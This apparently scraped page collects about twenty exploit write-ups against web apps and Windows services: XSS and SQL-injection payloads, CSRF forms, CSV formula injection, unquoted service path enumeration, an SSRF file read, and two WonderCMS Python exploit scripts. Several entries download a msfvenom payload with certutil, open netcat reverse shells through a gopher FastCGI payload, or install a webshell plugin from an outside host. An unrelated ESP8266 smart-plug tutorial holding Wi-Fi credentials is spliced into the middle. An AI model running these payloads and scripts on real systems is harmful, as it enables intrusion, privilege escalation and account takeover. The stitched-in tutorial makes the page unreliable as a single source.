HireHackking

# Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting # Date: 02/12/2020 # Exploit Author: Nikhil Kumar # Vendor Homepage: http://egavilanmedia.com/ # Software Link: http://egavilanmedia.com/expense-management-system/ # Tested On: Ubuntu Vunerable Parameter: "description=" Steps to Reproduce: 1. Open the index.php page using following url http://localhost/Expense-Management-System/index.php click on Add Expense 2. Put a payload on "description=" parameter Payload :- test"><script>alert("XSS")</script> Malicious Request:: POST /Expense-Management-System/expense_action.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 140 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/Expense-Management-System/ Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add

#Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection #Date: 2020-10-29 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://www.tendenci.com/ #Software Link: https://github.com/tendenci/tendenci #Version: 12.3.1 #Payload: =10+20+cmd|' /C calc'!A0 #Tested on: Kali Linux 2020.3 #Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists in Contact Us feature in Tendenci v12.3.1 via message field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Go to contact us page and enter the payload "=10+20+cmd|' /C calc'!A0" in the message field and submit the form 2. Login to the application and go to Forms section and export the contact us form entries 3. Click on Export and save the CSV file downloaded 4. Open the CSV file, allow all popups and our payload is executed (calculator is opened).

# Exploit Title: Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path # Date: 2020-08-28 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.intel.com/ # Version: v5.2 # Tested on: Windows 7 # Source: https://www.totalpentest.com/post/intel-r-user-notification-service-unquoted-service-path-privilege-escalation @ECHO OFF ECHO ======================================================================================================================= ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation ECHO ======================================================================================================================= ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc UNS ECHO [+] Your mandoroty level is: whoami /groups | findstr /B /C:"Mandatory Label" ::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe ECHO [?] ECHO [+] Enumeration was completed successfully. ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted. PAUSE certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will reboot. PAUSE shutdown /r /t 0 ::code end #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC) # Date: 2020-01-12 # Exploit Author: Ismael Nava # Vendor Homepage: https://www.asctimetables.com/#!/home # Software Link: https://www.asctimetables.com/#!/home/download # Version: 2021.6.2 # Tested on: Windows 10 Home x64 # STEPS # Open the program aSc Timetables 2021 # In File select the option New # Put any letter in the fiel Name of the Schooland click Next # In the next Windows click NEXT # In the Step 3, in Subject click in New # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Metoo.txt" # Paste the content in the field Subject title # Click in OK # End :) buffer = 'Z' * 10000 try: file = open("Metoo.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: ILIAS Learning Management System 4.3 - SSRF # Date: 10-08-2020 # Exploit Author: Dot/kx1z0 # Vendor Homepage: https://www.ilias.de/ # Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3 # Version: 4.3-5.1 # Tested on: Linux # Description We can create portfolios, export them to PDF and download them. The issue is that there is an HTML Injection, and if we inject HTML into the portfolio, when it is exported to PDF, it will be rendered. So we can take advantage that it is running under the wrapper file:// to inject an XMLHttpRequest requesting the local file we want, that when downloading the PDF, we can see the content of that file # Exploit We cannot inject the XMLHttpRequest directly into the content of the portfolio, as there is something blocking it. So we will have to host a script in our own server and invoke it from the portfolio We insert this in the portfolio: <script src=host.com/test.js> </script> Script in our server: x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); So, finally, we will only have to download the PDF and there, will be the content of the file we have requested.

# Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection # Google Dork: N/A # Date: 11/16/2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/ # Software Link: https://projectnotes.org/download/studentms-zip/ # Version: 1.0 # Tested on: Win10 x64, Kali Linux x64 # CVE : N/A ######## Description ################################################################# # # # An SQL injection vulnerability discovered in PHP Student Result Management System # # # # Admin Login Portal is vulnerable to SQL Injection # # # # The vulnerability could allow for the improper neutralization of special elements # # in SQL commands and may lead to the product being vulnerable to SQL injection. # # # ###################################################################################### Kindly Follow Below Steps: 1. Visit the main page of the Student Result Management System. 2. You will get an Admin Login Page. 3. Payload which you can use in Email and password field: *AND 1=0 AND '%'=' *4. You will get Admin Access of the Student Result Management System.

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF # Date: 01-12-2020 # Exploit Author: Hardik Solanki # Vendor Homepage: http://egavilanmedia.com # Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php # Version: 1.0 # Tested on Windows 10 CSRF ATTACK: Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same-origin policy, which is designed to prevent different websites from interfering with each other. Attack Vector: An attacker can update any user's account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user) Steps to reproduce: 1. Open user login page using the following URL: -> http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html 2. Now login with the "attacker" user account & navigate to the edit profile tab. Click on the "Update" button and intercept the request in web proxy tool called "Burpusite" 3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below code. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action=" http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php" method="POST"> <input type="hidden" name="fullname" value="Attacker" /> <input type="hidden" name="username" value="hunterr" /> <input type="hidden" name="email" value="noooobhunter&#64;gmail&#46;com" /> <input type="hidden" name="gender" value="Male" /> <input type="hidden" name="action" value="update&#95;user" /> <input type="submit" value="Submit request" /> </form> </body> </html> 4. Now, login with the "Victim/Normal user" account. (Let that user is currently authenticated in the browser). 5. Paste the URL in the browser, which is copied in step 3. OR submit the CSRF POC code, which is shown in step 3. 6. We receive a "Status: Success", which indicates that the CSRF attack is successfully done & the Attacker can takeover the user account via Stored XSS (Steal the authenticated Cookies of the user from the "FULL NAME" parameter) IMPACT: An attacker can takeover any user account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user)

# Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection # Date: 17-11-2020 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: http://egavilanmedia.com # Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/ # Version: 1.0 # Tested on: PopOS SQL Injection: SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. Attack Vector: An attacker can gain admin panel access using malicious sql injection queries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/Under%20Construction/admin/login.php 2. Now put below Payload in both the fields( User ID & Password) Payload: admin' or '1'='1 3. Server accepted our payload and we bypassed cpanel without any credentials

# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection # Google Dork: N/A # Date: 1.12.2020 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Kali Linux Use SQLMAP: sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting # Exploit Author: Soushikta Chowdhury # Vendor Homepage: http://egavilanmedia.com # Software Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/ # Version: 1.0 # Tested on: Windows 10 # Contact: https://www.linkedin.com/in/soushikta-chowdhury/ Vulnerable Parameters: Full Name Steps for reproduce: 1. Go to registration page 2. fill in the details & put <script>alert("soushikta")</script> payload in Full name. 3. Now goto Admin Panel. After entering go to Manage Users and go to the last page to check the newly added user. We could see that our payload gets executed.

# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution # Date: 2020-11-27 # Exploit Author: zetc0de # Vendor Homepage: https://www.wondercms.com/ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 16.04 # CVE : CVE-2020-35313 # WonderCMS is vulnerable to SSRF Vulnerability. # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS. # The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost. # when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. # the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000 # # python exploit.py # [+] Getting Token # [+] Sending payload # [+] Get reverse shell # nc -lnvp 1234 # Connection from 192.168.43.103:56956 # /bin/sh: 0: can't access tty; job control turned off # $ whoami # www-data # $ import requests from bs4 import BeautifulSoup from termcolor import colored from time import sleep print(colored(''' \ \ /_ \ \ | _ \ __| _ \ __| \ | __| \ \ \ /( |. | | |_| / ( |\/ |\__ \ \_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/ ------[ SSRF to Remote Code Execution ]------ ''',"blue")) loginURL = "http://wonder.com/loginURL" password = "GpIyq0RH" lhost = "192.168.43.66" lport = "1234" payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport) r = requests.session() data = { "password" : password } page = r.post(loginURL,data) if "Wrong" in page.text: print(colored("[!] Exploit Failed : Wrong Credential","red")) exit() print(colored("[+] Getting Token","cyan")) soup = BeautifulSoup(page.text, "html.parser") allscript = soup.find_all("script") no = 0 for i in allscript: if "rootURL" in str(i): url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") elif "token" in str(i): token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") def sendPayload(req,url,payload,token): getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token req.get(getShell) print(colored("[+] Sending payload","cyan")) sleep(1) print(colored("[+] Get reverse shell","cyan")) sendPayload(r,url,payload,token) print(colored("[+] Good bye","cyan"))

# Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path # Discovery by: Manuel Alvarez # Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/ # Discovery Date: 2020-11-27 # Tested Version: 1.0.6433.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """ Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto # Service info: C:\>sc qc StacSV [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: StacSV TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe GRUPO_ORDEN_CARGA : AudioGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS # Date: 2/12/2020 # Exploit Author: Amin Rawah # Vendor Homepage: https://www.paessler.com/prtg # Software Link: https://www.paessler.com/prtg # Version: 20.4.63.1412 x64 # Tested on: Windows # CVE : CVE-2020-14073 Description: Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator. Steps: 1- Login to PRTG system and view source code (currentUserId) 2- Create a map, add an element, double click the element and modify the HTML section 'HTML After' 3- In 'HTML After' add the following code: <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data"> <input type="hidden" name="name&#95;" value="PRTG&#32;Administrators" /> <input type="hidden" name="defaulthome&#95;" value="&#47;welcome&#46;htm" /> <input type="hidden" name="isadgroup" value="0" /> <input type="hidden" name="adusertype&#95;" value="0" /> <input type="hidden" name="aduserack&#95;" value="0" /> <input type="hidden" name="users&#95;" value="1" /> <input type="hidden" name="users&#95;" value="1" /> <input type="hidden" name="users&#95;&#95;check" value="<currentUserId>&#124;<YOUR_USERNAME>&#124;" /> <input type="hidden" name="users&#95;&#95;check" value="100&#124;PRTG&#32;System&#32;Administrator&#124;" /> <input type="hidden" name="id" value="200" /> <input type="hidden" name="targeturl" value="&#47;systemsetup&#46;htm&#63;tabid&#61;6" /> <input type="submit" value="Submit request" /> </form> <svg/onload='document.forms[0].submit()'/> 4- Save and share the link with PRTG Administrator. 5- Login with the highest privilege.

# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution # Date: 2020-11-27 # Exploit Author: zetc0de # Vendor Homepage: https://www.wondercms.com/ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 16.04 # CVE : CVE-2020-35314 # WonderCMS is vulnerable to Authenticated Remote Code Execution. # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS. # Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE. # python3 exploit.py http://wonder.com/loginURL GpIyq0RH # ------------- # [+] Getting Token # [+] Sending Payload # [+] Get the shell # [+] Enjoy! # $id # uid=33(www-data) gid=33(www-data) groups=33(www-data) import requests import sys import re from bs4 import BeautifulSoup from termcolor import colored print(colored(''' \ \ /_ \ \ | _ \ __| _ \ __| \ | __| \ \ \ /( |. | | |_| / ( |\/ |\__ \ \_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/ ------[ Auth Remote Code Execution ]------ ''',"blue")) if len(sys.argv) != 3: print(colored("[-] Usage : ./wonder.py loginURL password","red")) exit() loginURL = sys.argv[1] password = sys.argv[2] r = requests.session() data = { "password" : password } page = r.post(loginURL,data) if "Wrong" in page.text: print(colored("[!] Exploit Failed : Wrong Credential","red")) exit() print(colored("[+] Getting Token","blue")) soup = BeautifulSoup(page.text, "html.parser") allscript = soup.find_all("script") no = 0 for i in allscript: if "rootURL" in str(i): url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") elif "token" in str(i): token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip" def sendPayload(req,url,payload,token): getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token req.get(getShell) shell = url + "plugins/wonderplugin/evil.php" checkshell = req.get(shell) if "1337" in checkshell.text: return True else: return False print(colored("[+] Sending Payload","blue")) shell = sendPayload(r,url,payload,token) if shell == True: print(colored("[+] Get the shell","blue")) print(colored("[+] Enjoy!","blue")) shell = url + "plugins/wonderplugin/evil.php" while True: cmd = input("$") data = { "cmd" : cmd } res = r.post(shell,data) if res.status_code == 200: print(res.text) elif shell == False: print(colored("[+] Get the shell","blue")) print(colored("[+] Enjoy!","blue")) shell = url + "plugins/wonderplugin-master/evil.php" while True: cmd = input("$") data = { "cmd" : cmd } res = r.post(shell,data) if res.status_code == 200: print(res.text) else: print(colored("[!] Failed to exploit","red"))

# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path # Discovery by: manuel Alvarez # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.realtek.com/en/ # Tested Version: 1.0.64.7 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ Andrea RT Filters Service AERTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto # Service info: C:\Users\ComoDVD>sc qc AESTFilters [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: AESTFilters TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Andrea ST Filters Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting # Date: 27-11-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/ # Tested on: Windows 10/Kali Linux Steps-To-Reproduce: 1. Go to register 2. Add the payload in Username : <script>alert(1)</script> 3. And complete the register 4. Login to the account POST /vote/reg_action.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 593 Origin: http://localhost Connection: close Referer: http://localhost/vote/register.php Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep Upgrade-Insecure-Requests: 1 firstname=user1&lastname=user2&username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=testtest&g-recaptcha-response=03AGdBq24TB5LilE4y9YCZx4I_XrKLBs2ftYrVEJ70_vhpDG-FXCKhzfB-EmAD-NnhKRSZ8_A88_ZNB4nXnwMBs8cU1Qgrqzs8Yme0Bmral8WRK1umGikJeDzliuigIKgZ6Q2Me9zGS-ecZyrujgF4tKSlMs3K_KNgVhEhlAsslrfBe7jQg40aG3PdMCXTTOst4Lt91vswl1G_dmYjrLEh7AfLJS7XYgXrEt4Pfau_mJ3KzE_hf-MxbpTI9_NkCLanUiW8-VI1t3uopUbSE9xH53X1cUExoe_dGpwnkygZw_4yEDp-iBYA73wql5ow1W43OIn5pmSBz_Sdv1VbfAqbFMEIXXJx4o5D_TLiVKLDQCj2Vy-fRmohlpYwV76NR5Iu2D693FKCs3KODRNSaitpOevSfcYh3h05vCGuPSO1fCu4c3v1daiIdFKPwDvfKS_Lm8jgoFK4kfnZ&submit=Next

# Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting # Date: 24-11-2020 # Exploit Author: Parshwa Bhavsar # Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip # Version: 1.0 # Tested on: Windows 10/XAMPP Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack Vector : This vulnerability can result in the attacker to inject the XSS payload in the Title field of the page and each time any user will open the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Title Parameter in Edit Post Page. Payload : "><img src=x Onmouseover=alert(document.domain)> Vulnerable URL : http://localhost/online-news-portal/news_portal/admin/index.php?page=new_post Steps To Reproduce : 1) Go to the admin Dashboard 2) Click on Posts and click Add New button. 3) Put Payload into the Title parameter. 4) Click on Save. 5) XSS payload will be triggered.

In this article, we will use esp8266 to combine with relays to make a simple smart plug-in board. Route Map Practical objects Code #define BLINKER_PRINT Serial #define BLINKER_WIFI #define BLINKER_MIOT_LIGHT #include Blinker.h char auth[]='3aa44d779593'; char ssid[]='PDCN'; char pswd[]='1234567890'; //Create a new component object BlinkerButton Button1('btn-abc'); BlinkerNumber Number1('num-abc'); int counter=0; //Press the key and execute the function void button1_callback(const String state) { BLINKER_LOG('get button state: ', state); digitalWrite(LED_BUILTIN,digitalRead(LED_BUILTIN)); } //If an unbound component is triggered, the contents of it will be executed void dataRead(const String data) { BLINKER_LOG('Blinker readString: ', data); counter++; Number1.print(counter); } void miotPowerState2(const String state) { BLINKER_LOG('need set power state: ', state); if (state==BLINKER_CMD_ON) { digitalWrite(LED_BUILTIN, LOW); BlinkerMIOT.powerState('off'); BlinkerMIOT.print(); } else if (state==BLINKER_CMD_OFF) { digitalWrite(LED_BUILTIN, HIGH); BlinkerMIOT.powerState('on'); BlinkerMIOT.print(); } } void setup() { //Initialize the serial port Serial.begin(115200); #if defined(BLINKER_PRINT) BLINKER_DEBUG.stream(BLINKER_PRINT); #endif //Initialize the IO with LED pinMode(LED_BUILTIN, OUTPUT); digitalWrite(LED_BUILTIN, HIGH); //Initialize blinker Blinker.begin(auth, ssid, pswd); Blinker.attachData(dataRead); Button1.attach(button1_callback); BlinkerMIOT.attachPowerState(miotPowerState2); } void loop() { Blinker.run(); } Video Demo Problem to be solved At present, the problem is how to power esp8266. Thinking of directly using the voltage of the indicator light to power the ESP. However, the voltage was measured with a voltmeter and found to be 25v. The voltage is too high. A resistor is required in series. But there is no suitable resistor available on hand. So let it go first!

# Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting # Date: 26-11-2020 # Exploit Author: Parshwa Bhavsar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14609/bakeshop-online-ordering-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: Windows 10/XAMPP Payload : "><img src=x onerror=alert(1)> Steps to Reproduce :- 1. Login in admin dashboard & Click on 'Categories'. 2. You will notice the "New" button ,Click on that and You will notice the "Category" input field. 3. Put XSS Payload on that field and save it. 4. XSS will be triggered.

# Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting # Date: 2020-11-27 # Exploit Author: Emre Aslan # Vendor Homepage: https://www.netartmedia.net/newslister.html # Tested on: Windows & XAMPP ==> PoC <== 1- Login to admin panel. 2- Enter the payload to title value. 3- View the news. XSS will be execute. ==> HTTP Request <== GET /admin/index.php?page=add HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: host/admin/index.php?page=home Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: AuthUser=administrator~da1907216877e31462c14b35db67de32~1606484275; PHPSESSID=nn5gq66nla4lfs47fq9eoctvuf

# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass # Date: 21/11/2020 # Exploit Author: Aditya Wakhlu # Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # CVE: CVE-2021-3278 Step 1: Open the URL http://localhost:8080/lssems/admin/login.php Step 2: use payload Aditya' or 1=1# in user and password field Malicious Request::: POST /lssems/admin/ajax.php?action=login HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/lssems/admin/login.php Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3 username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23

# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting # Date: 20-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.wondercms.com/ # Version: 3.1.3 # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/hemantsolo/ # CVE: CVE-2020-29469 Attack vector: This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Menu. Steps-To-Reproduce: 1. Go to the Simple website builder. 2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>" 3. Now go to the website and the XSS will be triggered. GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 DNT: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93

# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) # Date: November 17th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: Source Code & Projects (https://code-projects.org) # Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf # Version: 1.0 # Tested On: Windows 10 (XAMPP Server) # CVE: CVE-2020-28688 --------------------- Proof of Concept: --------------------- 1. Authenticate as a user (or signup as an artist) 2. Click the drop down for your username and go to My ART+BAY 3. Click on My Artworks > My Available Artworks > Add an Artwork 4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload 5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution

